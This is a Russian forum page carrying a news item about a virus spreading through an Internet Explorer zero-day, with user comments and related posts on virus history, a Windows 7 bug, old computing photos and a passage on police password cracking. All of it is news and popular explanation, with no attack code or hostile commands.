189

Новый вирус распространяется на Windows-ПК через 0Day-уязвимость 

Новый вирус распространяется на Windows-ПК через 0Day-уязвимость  Уязвимость, Microsoft, Вирус, Безопасность, Компьютер

Эксперты по кибербезопасности из Qihoo 360 обнаружили новый вид компьютерного вируса, который успешно передаётся через 0Day-уязвимость в браузере Internet Explorer и приложениях на ядре IE.


Уязвимость нулевого дня в последних сборках Internet Explorer открывает злоумышленникам возможность установить бэкдор для вируса на компьютерах пользователей с ОС Windows через документы Microsoft Office. Для этого не обязательно постоянно пользоваться названным браузером, достаточно даже один раз, например, чтобы скачать более популярный Chrome. Нужно быть внимательным и не открывать документ MS Office, в котором "вшита" web-ссылка на установку вредоносного кода. Как только жертва открывает файл, на ПК с удалённого сервера загружаются компоненты для запуска трояна. В ходе атаки вирус использует способ обхода UAC (User Account Control, Контроль учетных записей), технику отражающей DLL-загрузки (Reflective DLL Loading), «безфайловую» загрузку и стеганографию файлов для засекречивания своей деятельности.


Корпорация Microsoft уже предупреждена об уязвимости, но пока соответствующая "заплатка" не выпущена. До этого момента эксперты по кибербезопасности рекомендуют не открывать незнакомые MS Office-документы из сомнительных источников.

24gadget

Новый вирус распространяется на Windows-ПК через 0Day-уязвимость  Уязвимость, Microsoft, Вирус, Безопасность, Компьютер

Дубликаты не найдены

+41
в браузере Internet Explorer и приложениях на ядре IE

Фу-у-ух, пронесло.

раскрыть ветку 3
+28

а меня вот нет, ибо часть тендерных площадок работают адекватно только под ослом. потому что их разрабатывали не то ослы, не то долбоебы

раскрыть ветку 2
+9

То есть под себя

+5
Прошлый раз когда прочитал такой пост про взлом SHA-1, мне всю ночь кошмары снились, что нашу сеть взламывают. А через несколько дней пришел Petya.A и положил все так, что я две недели ненавидел свой голос, разговаривая с юзерами по 8-9 часов, а последний сервис подняли только через 2 месяца. Хотя если безопасники долбоебы, такой сон просто не мог не стать вещим.
+7

Вот так и на Win начинают выходить вирусы, которые всё сложнее запустить.

раскрыть ветку 1
+1

безобразие..

+10
Комментарий удален. Причина: данный аккаунт был удалён
раскрыть ветку 2
0

Ага. Недавно вот перьевой ввод поломали.

раскрыть ветку 1
0
Комментарий удален. Причина: данный аккаунт был удалён
0
Тот случай, когда у тебя Линукс
*достал попкорн*
раскрыть ветку 23
+6

Для тех кто не знает, что первый вирус был написан под юникс платформу.

Ну и на закуску запуск любого стороннего ПО (в примере калькулятор /bin/xcalc ) из вредоносного js в браузере:

https://youtu.be/I6dQfnb3y0I?t=20m

раскрыть ветку 20
+1
Для тех кто не знает, что первый вирус был написан под юникс платформу.

первый фотошоп, принц персии и пр. тоже были под *nix написаны (Mac OS)... и что из этого ?


факт остается фактом, вирус (именно как вирус, т.е. автономно запускающийся и копирующий себя код) под (все) Linux создать, а тем более подхватить так же маловероятно, как найти кокосы в Сибири, на ёлке в ноябре месяце.

раскрыть ветку 19
+1

как будто в линуксе нет уязвимостей)

раскрыть ветку 1
-4

Таких серьезных не встречал

0

Возможно эту заразу я и поймал дней 10 назад на вин7. Ничего не спасло, ни UAC на максимуме, ни запрет исполнения макросов в экселе, ни нод. Стал сам по себе запускаться процесс EXCEL.EXE. Причём обычно 2 отдельных процесса. Удалил офис - не помогло. Всё равно этот процесс сам запускался. Я в ноде запретил ему доступ в инет, а он стал ... бля, хз, как это назвать, поскольку не специалист... ну кароч, стали окна нода всплывать, что эта зверюга цепляется то к лисе, то к виртуал боксу. Пересел на линь.

Что характерно, ослом не пользуюсь, пытаюсь припомнить, возможно экселевский файл открывал.... ёпта, обычно в инет через виртуалку лазил, но всё равно подцепил где-то. Вот срань господня.

раскрыть ветку 2
+1
Диспетчер задач, на процессе правой кнопкой --> открыть место хранения файла
раскрыть ветку 1
0
Поздняк метаццо, уже переехал на линукс минт.
0

У меня такое ощущение что где-то уже не один месяц проходит крупный хакерский форум)

-2

нет офиса - нет проблем.

раскрыть ветку 3
+1

Той же логикой руководствовался майкрософт, когда удалил обновлением из офиса старый редактор формул. До сих пор горит с этого.

Делаем ставки, что уберут дальше.

Зы: дуалбутом стоит линух.

раскрыть ветку 2
0

На 10-ке и 16 офисе сидишь?

раскрыть ветку 1
Похожие посты
149

Записки ведущего #46 Баста, карапузики, кончилися танцы

Привет всем моим подписчикам и Пикабутянам! Я пишу о праздниках и около праздничной суете.

В стране бушует вирус, и эта тема коснулась нашей братии на 146%. Сейчас я приоткрою завесу тайны о настроениях за кулисами организаторов и ведущих торжеств.

Для начала о моей ситуации на апрель:
👉 10.04 Юбилей
👉 11. 04 Свадьба
👉 12.04 Квиз в ресторане
Всё полетело к чертям.
100% Отмены.

👉 18.04 Свадьба
👉 25.04 Свадьба
👉 30.04 Свадьба
Под бооольшим вопросом...

Все чаты ведущих и организаторов переполнены паникой. Коллеги обсуждают как сохранить свои мероприятия. Обсуждают тему возврата или невозврата предоплат.

Прекрасно понимаю, что долгое ожидание торжества со стороны невест, и финансовая нестабильность со стороны подрядчиков побуждает людей на не самые светлые поступки :

Записки ведущего #46 Баста, карапузики, кончилися танцы Ведущий Андрей Родионов, Кризис, Вирус, Безопасность, Свадьба, Берегите себя, Негатив, Надежда, Длиннопост

Но дело даже не в том, чтобы отгулять долгожданное событие или получить гонорар. Суть в том, что в угоду своих желаний, не стоит отправляться в общественные места пренебрегая опастностью заражения себя и близких.

Вчера вечером я принял решение, что на свои торжества в апреле я не поеду и либо предложу провести свои мероприятия коллегам, либо верну предоплату.

У меня двое детей и если заражусь, то мы с супругой поедем на 21 день во взрослый карантин, а дети (7, 5 лет и грудничёк 6ти месяцев) в детский стационар. Так себе перспектива.

Интернет переполнен видео где вместо того, чтобы сидеть по домам-люди жарят шашлык, а другие делают про первых видеообзоры и гуляют в центре города. Сколько из них уже стало потенциальными носителями?

Я вас очень прошу- не гуляйте на торжествах, как минимум в ближайший месяц. Оградите себя и своих близких. Всё это через несколько месяцев обязательно закончится и тогда хоть неделю веселитесь. Тем более, по окончании всей этой истории праздник вам выйдет значительно дешевле 😁

Не давайте вирусу повода и всё будет лучше.

Радость от мимолётного торжества может нивелироваться последствиями, о которых (возможно) придётся Горько пожалеть.

p. s. В свете последних событий, следующий пост будет то же весьма мрачен.
Будет интересно, хоть и не особо весело. Подписывайтесь. Погрустим вместе.

Показать полностью
723

Пользователи Windows 7 не могут перезагрузить свои компьютеры

На ошибку пожаловалось множество людей.

Множество пользователей компьютеров, которые находятся под управлением операционной системы Windows 7, пожаловались на ошибку, из-за которой им не удается выключить устройство и даже перезагрузить систему. Об этом пишет ZDNet.

Пользователи Windows 7 не могут перезагрузить свои компьютеры Windows 7, Microsoft, Проблема, Рен ТВ, Компьютер, Софт

Изображение через @Trendswood

Первые сообщения о неприятности, постигшей пользователей, начали появляться на разных технических форумах несколько дней назад.


Некоторые при попытке выключить компьютер получают сообщение "У вас нет разрешения на выключение этого компьютера", из-за чего завершить операцию невозможно.


Пока что природа ошибки остается неизвестной. Однако один из пользователей все же предложил свое решение возникшей проблемы.


По его словам, при этой ошибке для корректного выключения либо же перезагрузки компьютера нужно создать новую учетную запись с правами администратора. Затем необходимо снова войти в предыдущую учетную запись с правами администратора по умолчанию.


После выполнения этих действий часть пользователей сообщила об исчезновении ошибки.


Microsoft прекратила поддержку операционной системы Windows 7 в середине января текущего года, выпустив при этом обновление, которое должно было стать финальным.


Однако в феврале компания выпустила еще одно обновление операционной системы Windows 7, которое исправляло ошибку со сбросом фонового изображения рабочего стола, появившуюся с выходом январского обновления.

Источник:


https://ren.tv/news/v-mire/658849-polzovateli-windows-7-ne-m...

123

Чем болеют братья наши железные — история компьютерных вирусов

Чем болеют братья наши железные — история компьютерных вирусов Компьютер, Вирус, История, Программа, Длиннопост

Ушла эпоха, когда компьютеры и интернет воспринимались большинством, как высокотехнологичные игрушки для подростков. Теперь они, хотим мы того или нет — одна из несущих стен жизненного уклада каждого. Зараженный компьютер — это гораздо больше, чем досадная поломка дорогой техники. Это риск информационных, потенциально и репутационных, финансовых потерь. Подхватить грипп для многих уже гораздо менее неприятный сценарий, чем подхватить компьютерный вирус.


Между тем и сама железная зараза за годы ее существования изменилась кардинально. Если первые ее представители создавались научного интереса ради, с целью вендетты, ну или просто чтобы досадить как можно большему числу ламеров, то современная инфекция — это могущественное оружие, используемое для краж, рэкета (со взятием ПК в заложники), давления на конкурентов и выведения из строя целых предприятий.


Концепция вирусов, как размножающихся без участия человека механизмов, была предсказана еще в 1951 году Джоном Нейманом в его «Теории самовоспроизводящихся автоматических устройств». Само же явление увидело свет… и вот здесь данные разнятся. Дело в том, что первые программы, которые можно окрестить этим болезненным словом, были либо вовсе безвредны, либо задумывались с невинной целью и причиняли неудобства, скорее вследствие недоработки.


Так, в 1973 году прототип интернета — ARPANET в лабораторных застенках поразил шалун Creeper. Он самостоятельно путешествовал от компьютера к компьютеру и дразнил пользователей выводящимся на экраны сообщением: «Я Крипер! Поймай меня, если сможешь». Этим зловредность Крипера и ограничивалась.


А в 1975 году Джон Волкер написал PERVADE — подпрограмму для популярной (по меркам тех лет) игры ANIMAL, которая с помощью наводящих вопросов отгадывала названия задуманных игроком животных. С натяжкой ее можно назвать первым трояном. После каждой партии она модернизировала игру новыми вопросами, а заодно и копировала ее во все директории компьютера, чем основательно замусоривала и без того скудную память. А ведь Волкер всего-то навсего хотел упростить распространение ANIMAL и избавить себя от нескончаемых просьб, желающих выслать им очередную копию игры.


Вирус Elk Cloner, который многие считают первым истинным вирусом, получившим массовое распространение на пользовательских компьютерах, изначально задумывался, как невинная шалость в духе Крипера. В 1981 году он принялся заражать Apple II, перемещаясь между машинами с помощью дискет. На каждый 50-й запуск системы он выводил на экраны стихотворение:


Elk Cloner: программа с индивидуальностью


Она проникнет во все ваши диски


Она внедрится в ваши чипы


Да, это — Cloner!


Она прилипнет к вам как клей


Она даже изменит оперативную память


Cloner выходит на охоту!


Вредительских функций написавший Cloner 15-летний школьник Ричард Скренет не предусматривал. Однако своенравный вирус повадился портить диски с нестандартными версиями DOS, удаляя содержимое резервных дорожек. Ущерб в таких случаях был уже вполне осязаем, в отличии от душевных страданий, вызванных стишком-дразнилкой.


Многие ругают антипиратскую защиту игр Denuvo, но в 80-е методы борьбы с пиратами были куда менее гуманны. В 1986 году братья Фарук Альви решили защитить свою программу для наблюдения за сердечным ритмом от незаконного копирования при помощи вируса Brain. Он заражал загрузочный сектор жесткого диска, замедлял работу и вежливо предлагал позвонить создателям нелегально установленной программы, чтобы излечиться. Только в США оказались заражены 18 тысяч компьютеров, а братья Альви первыми познали гнев недовольных антипиратской защитой пользователей.


А вот вирус Jerusalem был написан чистейшего зла ради в 1987-м. Он заражал файлы EXE, COM и SYS. Каждый раз при активации запрашиваемые файлы увеличивались в размере, что приводило к захламлению памяти. Также через полчаса после запуска системы Jerusalem серьезно замедлял ее работу, изменяя время прерывания процессов. Но то были лишь цветочки. Во всей красе Jerusalem проявлял себя в пятницу 13-го, уничтожая любой запущенный в этот день файл.


Первый сетевой червь-шпион атаковал ARPANET в 1988. По замыслу создателя Червь Морриса должен был лишь собирать данные о владельцах ПК, подключенных к ARPANET. Для проникновения он использовал уязвимости почтовых сервисов и сетевых протоколов. Червь Морриса подбирал пароль по словарю и инфицировал компьютер, если не обнаруживал на нем своей копии. Но, даже если копия вируса на компьютере уже была, с небольшой периодичностью червь инфицировал его повторно. На всякий случай. Это и послужило основным источником проблем. Компьютеры заражались многократно, работа системы все больше замедлялась, вплоть до полного отказа. Суммарный ущерб от действий червя оценили в 96 миллионов долларов. Обескураженный непредвиденными последствиями создатель сам сдался полиции, благодаря чему отделался штрафом и исправительными работами.


Первый зловред-вымогатель, словно благодаря ясновидению, позволившему его создателю предсказать масштабы пандемии, вызванной его потомками в будущем, был окрещен — AIDS (СПИД). Вирусописец Джозеф Попп собственноручно разослал около 20 000 дискет с вирусом (каторжный труд, в сравнении с современной почтовой спам-рассылкой, посредством пары кликов). Дискеты манили новой информацией о настоящем НЕкомпьютерном вирусе СПИДА, но после проникновения зараженной дискеты в дисковод PC, в определенном смысле происходило именно то, чего беспечные пользователи и боялись — инфицирование. Через 90 запусков компьютера AIDS шифровал все файлы, оставляя в доступности лишь README, в котором находилось предложение отправить деньги на почтовый ящик в Панаме в обмен на восстановление доступа к информации. Во время обналичивания такого чека Джозефф Попп и был арестован и впоследствии осужден за вымогательство.

Чем болеют братья наши железные — история компьютерных вирусов Компьютер, Вирус, История, Программа, Длиннопост

Вирусы лихих 90-х были не в пример добрее и невиннее своего десятилетия. Часто они писались ради забавы и самовыражения, вне зависимости от того сколько бед приносили. Так, вирус Walker раз в 30 секунд отправлял гулять по экрану дедушку. По-видимому, из уважения к старости, пока дедушка ковылял, компьютер зависал и не реагировал на команды пользователя. Романтичный вирус Girls признавался в любви всем девочкам и запускал песню Yesterday группы The Beatles. А Mars Land каждый час по полминуты заставлял пользователей любоваться высококачественной 3D-моделью поверхности Марса.


1995 год ознаменовался появлением первого макровируса Concept. Инновационные вирусы распространялись при помощи макросов в документах Word. Для их написания не нужно было владеть языком программирования, достаточно лишь разобраться в WordBasic (чему тоже далеко не каждую бабушку можно научить, но все же). Вирусоделие пошло в массы, и к 1998 году число вредоносного ПО увеличилось почти в 4,5 раза.


Тогда же, в 1998 году, увидел свет кинескопа троян Back Orifice, по совместительству первый бэкдор — вредоносная программа удаленного администрирования. Установленный на компьютер жертвы Back Orifice давал злоумышленнику практически безграничную удаленную власть над его системой. ЛЮБОЙ файл можно было скачать, переписать, уничтожить. Вводимые с клавиатуры пароли, выводимые на экран монитора изображения — все становилось достояние хакера. Создатели бэкдора охарактеризовали свой продукт слоганом — «В локальной сети или через Internet Back Orifice предоставляет пользователю больше возможностей на удаленном Windows-компьютере, чем имеет сам пользователь этого компьютера».


«Чернобыль» или CIH почти год, не обнаруживая себя, заражал компьютеры по всему миру. А 26-го апреля 1999 года, в годовщину аварии на Чернобыльской АЭС, около полумиллиона владельцев PC испытали на себе новый вид техногенной катастрофы — вся информация на их компьютерах оказалась уничтоженной. «Чернобыль» не пожалел даже BIOS, повредив данные на микросхемах. Интересно, что автор CIH, Чэнь Инхао, хоть и испытал глубокий стыд, и даже написал заблаговременно официальное извинение, не получил никакого наказания, так как не нарушил ни одного Тайваньского закона того времени.


Появление вируса Happy99 дало начало массовому переходу вирусов к распространению через интернет. Счастливый «червь» передвигался с помощью EXE-файла вложенного в электронное письмо. Он поздравлял «счастливчика» с новым 1999 годом, а после копировал свой код в системный каталог Windows.


Таким же незамысловатым способом в мае 2000 года распространился и вирус LoveLetter. Этот подлец играл на самых тонких струнах человеческой психики и рассылал «любовные послания», открыв которые, пользователь кроме глубокого разочарования получал еще и гору проблем в придачу. Вирус не только портил личные файлы и заменял их зараженными, но и пересылал сам себя всем контактам в адресной книге Microsoft Outlook. За такие подвиги почтовый червь ILOVEYOU попал в книгу рекордов Гиннеса и стал героем фильма.


Еще один представитель опасных сетевых беспозвоночных — Code Red. Летом 2001 года вирус был выпущен в сеть. Он заражал компьютеры не благодаря доверию наивных людей, а при помощи уязвимости в веб-сервере Microsoft IIS. В начале Код Красный не вызывал опасений. Ну кого, в самом деле, способна напугать надпись на экране «Взломано китайцами»? Но позже оказалось, что зараженный сервер спустя 20 дней должен был начать DDOS-атаку на несколько IP-адресов, в числе которых оказался и Белый дом США.


Через пару лет своими «успехами» на поприще интернет-вредительства смогли похвастаться SQL Slammer и Conficker. Slammer, используя переполнение буфера в Microsoft SQL server, вызвал массовый паралич пользовательского трафика. Перегруженные роутеры просто не справлялись и постоянно восстанавливали таблицу маршрутизации, тем самым задерживая и останавливая сетевой трафик. Червь настолько стремительно распространился, что умудрился на сутки лишить всю Южную Корею радости от просмотра котиков в интернете и каток в Starcraft.


В свою очередь, вирус Conficker в лучших традициях вестернов заставил объединиться в борьбе с ним крупнейшие корпорации — Microsoft, Dr.Web, Kaspersky Lab, ESET, Symantec. А Microsoft даже пообещала 250 тысяч долларов тому, кто найдет создателя червя. Conficker осущесталял свои гадкие планы с помощью все того же пресловутого переполнения буфера. В первую очередь он отключал службы обновления и защиты Windows и блокировал сайты производителей антивирусов, а потом зомбировал компьютер и подключал его к ботнет-сети. Специалисты пришли к выводу, что главной целью вредителя была проверка его способностей к размножению.


Но все вышеупомянутые вирусы — просто игрушки в сравнении со Stuxnet. Эта компьютерная чума могла поражать не только устройства обычных пользователей, но и системы важных промышленных предприятий, в том числе атомных электростанций. В Иране Stuxnet устроил из центрифуг для обогащения урана настоящий аттракцион. Вопрос «Зачем?» оставим любителям теорий заговора.


В 2012 году эволюция вирусов дала новый виток. Теперь они стали реальным кибероружием и средством шпионажа. Аналитикам Лаборатории Касперского пришлось изрядно попотеть с обнаружением ряда вредоносных программ. Таких как – Flame, Gauss, Red October, NetTraveler и Icefog. Все они заслуженно могут носить звание кибер-агентов 007, поскольку каждый вирус детально изучал и похищал важную правительственную, дипломатическую и финансовую информацию. Жертвами хакерских атак стали более 40 стран.


В марте 2016 года взошла звезда ужасного, но великого Пети (Petya), положив начало новой вирусной эпохе. Программа-вымогатель превращала файлы пользователей в тыкву, шифруя MBR-данные, которые нужны компьютеру для загрузки операционной системы. Для расшифровки она требовала от пользователей выкуп в биткоинах.


В 2017 году явил себя свету еще один червь-шантажист — WannaCry. Программа угрожала уничтожить все зашифрованные файлы через неделю после заражения, если владелец не заплатит выкуп в размере примерно 300 долларов США, но в криптовалюте. Необходимую сумму следовало перечислить в течение 3-ех дней, в противном случае — сумма удваивалась.


Всего через месяц после атаки WannaCry вернулся Petya. Новой модификации дали название NotPetya (интересно, кто-то уже пробовал называть так детей?). Петя новый — трюки старые. Для получения доступа к компьютеру программа использовала те же уязвимости системы, что и WannaCry при помощи эксплойта EternalBlue (предположительно разработан АНБ) и бэкдора DoublePulsar. Отдавать дань за возвращение своих информационных богатств было абсолютно бессмысленно — вирус уничтожал данные, а электронный адрес хакерских дел мастеров уже заблокировали провайдеры.

Чем болеют братья наши железные — история компьютерных вирусов Компьютер, Вирус, История, Программа, Длиннопост

НеПетя нападал на правительственные сайты, национальные банки и энергетические компании Украины, устроил коллапс в аэропорту Харькова и Киева, атаковал российские банки и крупные предприятия, а потом приступил к «заражению» Индии и стран Европы. Специалисты компании ESET и Microsoft выяснили, что нулевыми пациентами стали владельцы украинского программного обеспечения M.E.doc. Также аналитики полагают, что НеПетя отвлекал внимание вымогательством денег, в то время как его настоящей целью был массовый ущерб, поскольку зашифрованные данные не возвращались.


2018 год не стал годом отдыха от хакеров. Эксперты компании Dr.Web нашли новую головную боль — троянскую программу, похищающая данные к учетным записям пользователей в онлайн-сервисах и социальных сетях, изображения и текстовые файлы. На этот раз кибер-злодей не присылал писем счастья, а публиковал ссылки в комментариях к видео на YouTube. Часто в описании зловредной ссылки он сулил доступный для бесплатного скачивания путеводитель по чит-кодам для популярных онлайн-игр. Но после перехода любопытный читер получал не волшебную таблетку, а троянский архив со всеми вытекающими… Хорошая новость (не для сторонников честной игры и естественного отбора конечно же) в том, что автор трояна был найден. Им оказался печаль-разработчик под ником «Енот Погромист».


И вот, совсем уже недавно, в январе 2019 появился очередной вирус-шифровальщик Djvu. Попадая в компьютер вместе с пиратским контентом, Djvu загружает 4 файла, один из которых призван отвлекать внимание жертвы, показывая окно обновления системы Windows. После завершения шифрования в игру вступает «заманчивое предложение» от вымогателей. Цену за возвращение информации авторы шифровальщика не указывают, но сообщают о скидке за быстрое реагирование (однако, вирулентности маркетинга позавидовал бы любой вирус). К сожалению, способ дешифровать файлы до сих пор не найден.


Источник

Показать полностью 2
62

Уникальные фотографии из истории вычислительной техники, часть 3

Первая часть https://pikabu.ru/story/unikalnyie_fotografii_iz_istorii_vyi...

Вторая часть https://pikabu.ru/story/unikalnyie_fotografii_iz_istorii_vyi...


До сегодняшнего дня эти фотографии были в сети лишь в плохом качестве, либо вовсе отсутствовали.

Уникальные фотографии из истории вычислительной техники, часть 3 Компьютер, Старое фото, Ретро, История, Книги, Билл Гейтс, Microsoft, Ibm, Длиннопост

Билл Гейтс на Всемирной конференции по компьютеру Altait в 1976 году

Уникальные фотографии из истории вычислительной техники, часть 3 Компьютер, Старое фото, Ретро, История, Книги, Билл Гейтс, Microsoft, Ibm, Длиннопост

Статья Билла Гейтса - атака на пиратов программного обеспечения, опубликованная в бюллетене компьютерного клуба Homebrew в 1976

Уникальные фотографии из истории вычислительной техники, часть 3 Компьютер, Старое фото, Ретро, История, Книги, Билл Гейтс, Microsoft, Ibm, Длиннопост

Филип Эстридж, возглавлявший проект по разработке IBM PC

Уникальные фотографии из истории вычислительной техники, часть 3 Компьютер, Старое фото, Ретро, История, Книги, Билл Гейтс, Microsoft, Ibm, Длиннопост

Билл Гейтс и Пол Аллен 19 октября 1981 года после подписания контракта с IBM на программное обеспечение для IBM PC

Уникальные фотографии из истории вычислительной техники, часть 3 Компьютер, Старое фото, Ретро, История, Книги, Билл Гейтс, Microsoft, Ibm, Длиннопост

Шаль Шимони и Билл Гейтс, сотрудники Microsoft

Уникальные фотографии из истории вычислительной техники, часть 3 Компьютер, Старое фото, Ретро, История, Книги, Билл Гейтс, Microsoft, Ibm, Длиннопост

Билл Гейтс демонстрирует свою программу предпринимателю и издателю Дэвиду Баннеллу. 1981 год

Уникальные фотографии из истории вычислительной техники, часть 3 Компьютер, Старое фото, Ретро, История, Книги, Билл Гейтс, Microsoft, Ibm, Длиннопост

Стив Баллмер и Билл Гейтс


Эти фотографии взяты из русскоязычного издания книги "Пожар в долине" Пола Фрейбергера и Майкла Свейна. В ней живым языком описана история персональных компьютеров, начиная с изобретения транзистора и вплоть до конца двадцатого века. Ссылку на скачивание книги оставлю в комментариях. Сканировал я, поэтому ставлю соответствующий тег.

Показать полностью 6
462

Как вскрывают пароли представители  правоохранительных органов

Как вскрывают пароли представители  правоохранительных органов Хакеры, Взлом, Вирус, Шифрование, Интернет, Безопасность, IT, Исследования, Длиннопост

Хакеры, мошенники, работники IT-безопасности, следственные органы и спецслужбы — все они при определенных обстоятельствах могут попытаться добраться до информации, защищенной с помощью паролей. И если инструменты, которыми пользуются хакеры и спецслужбы, в целом практически совпадают, то подход к задаче отличается кардинальным образом. За исключением единичных дел, на раскрытие которых могут быть брошены огромные силы, эксперт работает в рамках жестких ограничений как по ресурсам, так и по времени, которое он может потратить на взлом пароля. Какие подходы используют правоохранительные органы и чем они отличаются от работы хакеров — тема сегодняшнего материала.


Добрым словом и пистолетом

Разумеется, в первую очередь представители органов безопасности действуют методом убеждения. «Ты не выйдешь отсюда, пока не разблокируешь телефон», — говорят они задержанному, положив перед ним документ, где английским по белому написано, что «предъявитель сего имеет право досмотреть содержимое мобильных устройств» задержанного. Вот только о том, что задержанный обязан собственный телефон разблокировать, в документе ни слова. Что совершенно не мешает органам безопасности беззастенчиво пользоваться правом, которого у них нет.


Трудно в такое поверить? На самом деле не очень: последний такой случай произошел буквально на днях. Американский гражданин Сидд Бикканнавар (Sidd Bikkannavar), работающий в NASA, был задержан на границе при въезде в страну; именно «словом и пистолетом» его убедили разблокировать корпоративный смартфон.


Да, ты не обязан свидетельствовать против самого себя и выдавать свои пароли. Этот принцип наглядно иллюстрируется очередным случаем. Подозреваемый в хранении детской порнографии сидит уже 27 месяцев за то, что отказывается сообщить пароли от зашифрованных дисков. Презумпция невиновности? Не, не слышали.


Впрочем, подобные меры можно применять не всегда и не ко всем. Мелкого мошенника, брачного афериста или просто любителя накачать музыки «про запас» без внятных доказательств в тюрьму не запрешь, равно как и серьезного преступника с деньгами и адвокатами. Данные приходится расшифровывать, а пароли — вскрывать. И если в делах, связанных с тяжкими преступлениями и угрозой национальной безопасности (терроризм), руки у экспертов развязаны, а ограничений (финансовых и технических) практически нет, то в остальных 99,9% случаев эксперт жестко ограничен как доступными вычислительными возможностями лаборатории, так и временными рамками.


А как с этим обстоят дела в России? На границе устройства разблокировать пока не заставляют, но… процитирую эксперта, который занимается извлечением информации с телефонов и компьютеров задержанных: «Самый действенный способ узнать пароль — это звонок следователю».


Что можно сделать за 45 минут? А за два дня?

Фильмы не всегда врут. На одной из выставок ко мне подошел человек, в котором я сразу опознал начальника полицейского участка: большой, лысый и чернокожий. Информация с жетона подтвердила первое впечатление. «У меня в участке штук двести этих… айфонов, — с ходу начал посетитель. — Что вы можете сделать за 45 минут?» С такой постановкой вопроса мне раньше сталкиваться не приходилось. Впрочем, на тот момент (три года назад) еще были популярны устройства без сканера отпечатков, Secure Enclave только-только появился, а с установкой jailbreak проблем, как правило, не возникало. Но вопрос занозой засел у меня в голове. Действительно, а что можно сделать за 45 минут? Прогресс идет, защита усложняется, а времени у полиции больше не становится.


В самых незначительных делах, когда телефон или компьютер пользователя конфискуются «на всякий случай» (например, задержали за мелкое хулиганство), у следствия не будет ни времени, ни сил, ни зачастую работников высокой квалификации для вскрытия пароля. Не удалось разблокировать телефон за 45 минут? Обратимся к уликам, собранным более традиционным образом. Если за каждое зашифрованное устройство каждого мелкого хулигана биться до последнего, ресурсов не хватит ни на что другое.


В более серьезных случаях, когда конфискуется в том числе и компьютер подозреваемого, следствие может приложить и более серьезные усилия. Опять же, от страны, от тяжести преступления, от важности именно цифровых улик будет зависеть и количество ресурсов, которые можно затратить на взлом.


В разговорах с полицейскими разных стран чаще всего возникала цифра «два дня», при этом подразумевалось, что задача ложится на существующий кластер из пары десятков компьютеров. Два дня на вскрытие паролей, которыми защищены, к примеру, криптоконтейнеры BitLocker или документы в формате Office 2013, — не слишком ли мало? Оказывается, нет.


Как они это делают

Инструменты для взлома паролей у полиции были изначально, но полноценно применять их научились не так давно. К примеру, полицию всегда интересовали пароли, которые можно извлечь из компьютера подозреваемого, — но извлекали их сначала вручную, потом — при помощи единичных утилит, которые могли, например, получить только пароль от ICQ или только пароль к учетным записям в Outlook. Но в последние несколько лет в полиции пришли к использованию инструментов «всё в одном», которые сканируют жесткий диск и Registry устройства и сохраняют в файл все найденные пароли.


Во многих случаях полиция пользуется услугами частных криминалистических лабораторий — это касается как рутины, так и громких дел (толстый намек на процесс в Сан-Бернардино). А вот «частники» готовы воспользоваться самыми «хакерскими» методами: если оригинальные данные не изменяются, а следов вмешательства не остается, то способ, которым был добыт нужный пароль, значения не имеет, — в суде эксперт может сослаться на коммерческую тайну и отказаться раскрывать технические детали взлома.


Реальные истории

Иногда действовать требуется быстро: вопрос не в ресурсах, вопрос во времени. Так, в 2007 году в лабораторию поступил запрос: пропал 16-летний подросток. Родители обратились в (тогда еще) милицию, которая и пришла в лабораторию с ноутбуком пропавшего. Ноутбук защищен паролем. Было понятно, что нескольких месяцев на перебор паролей нет. Пошла работа по цепочке. Снят образ диска, параллельно запущена атака на пароль в Windows. Запущен поиск паролей на диске. В результате в Elcomsoft Internet Password Breaker был найден пароль к почте. Больше ничего интересного на компьютере не оказалось. Ничего, что могло бы помочь в поисках, в почте не было, но через почтовый ящик удалось сбросить пароль к ICQ, а там обнаружилась переписка с друзьями, из которой стало понятно, в какой город и к кому «пропал» подросток. Закончилось благополучно.


Однако далеко не всегда у историй хороший конец. Несколько лет назад в лабораторию обратился французский частный следователь. Его помощи попросила полиция: пропал известный спортсмен. Полетел в Монако, дальше следы теряются. В распоряжении следствия оказался компьютер спортсмена. Проанализировав содержимое диска, на компьютере обнаружили iTunes и панель управления iCloud. Стало понятно, что у спортсмена iPhone. Попробовали получить доступ к iCloud: пароль неизвестен, но маркер аутентификации (вытащили из iCloud Control Panel) сработал. Увы, как это часто бывает, в облачной резервной копии не оказалось никаких намеков на местонахождение «пропажи», а сама резервная копия была создана чуть ли не полтора месяца назад. Внимательный анализ содержимого позволил обнаружить пароль от почты — он был сохранен в заметках (тот самый «желтый стикер» с паролем, чтобы не забыть). Зашли в почту, нашли бронь отеля. Полиция подхватилась… Увы, история закончилась плохо: спортсмена нашли мертвым.


Но вернемся к нашим двум дням для взлома. Что можно сделать за это время?


Насколько (бес)полезны стойкие пароли

Не сомневаюсь, ты много раз слышал советы, как выбирать «стойкий» пароль. Минимальная длина, буквы и цифры, специальные символы… А так ли это важно на самом деле? И поможет ли длинный пароль защитить твои зашифрованные тома и документы? Давай проверим!


Для начала — немного теории. Нет, мы не будем в очередной раз повторять мантру о длинных и сложных паролях и даже не будем советовать пользоваться паролехранилками. Просто рассмотрим две картинки:

Как вскрывают пароли представители  правоохранительных органов Хакеры, Взлом, Вирус, Шифрование, Интернет, Безопасность, IT, Исследования, Длиннопост

Скорость перебора паролей с использованием видеокарты: вот BitLocker и RAR5

Как вскрывают пароли представители  правоохранительных органов Хакеры, Взлом, Вирус, Шифрование, Интернет, Безопасность, IT, Исследования, Длиннопост

а вот Microsoft Office, Open Office и IBM Notes


Как видим, скорость перебора для томов BitLocker — всего 860 паролей в секунду при использовании аппаратного ускорителя на основе Nvidia GTS 1080 (к слову, это действительно быстро). Для документов Microsoft Office 2013 цифра повыше, 7100 паролей в секунду. Что это означает на практике? Примерно вот это:

Как вскрывают пароли представители  правоохранительных органов Хакеры, Взлом, Вирус, Шифрование, Интернет, Безопасность, IT, Исследования, Длиннопост

Таким образом, на очень быстром компьютере с аппаратным ускорителем пароль, состоящий из пяти букв и цифр, будет взломан за день. Если в том же пятизначном пароле затешется хотя бы один специальный символ (знак препинания, #$%^ и подобное), ломать его придется уже две-три недели. Но пять знаков — мало! Средняя длина пароля сегодня — восемь символов, а это уже далеко за пределами вычислительных возможностей даже самых мощных кластеров в распоряжении полицейских.


Тем не менее большинство паролей все-таки вскрывается, и именно за два дня или даже быстрее, причем вне зависимости от длины и сложности. Как так? Неужели полицейские, как в фильмах, узнают имя собачки подозреваемого и год рождения его дочери? Нет, все гораздо проще и эффективнее, если говорить не о каждом отдельном случае, а о статистических показателях. А с точки зрения статистики гораздо выгоднее использовать подходы, которые работают в «большинстве» случаев, даже если они не дадут результата в конкретном деле.


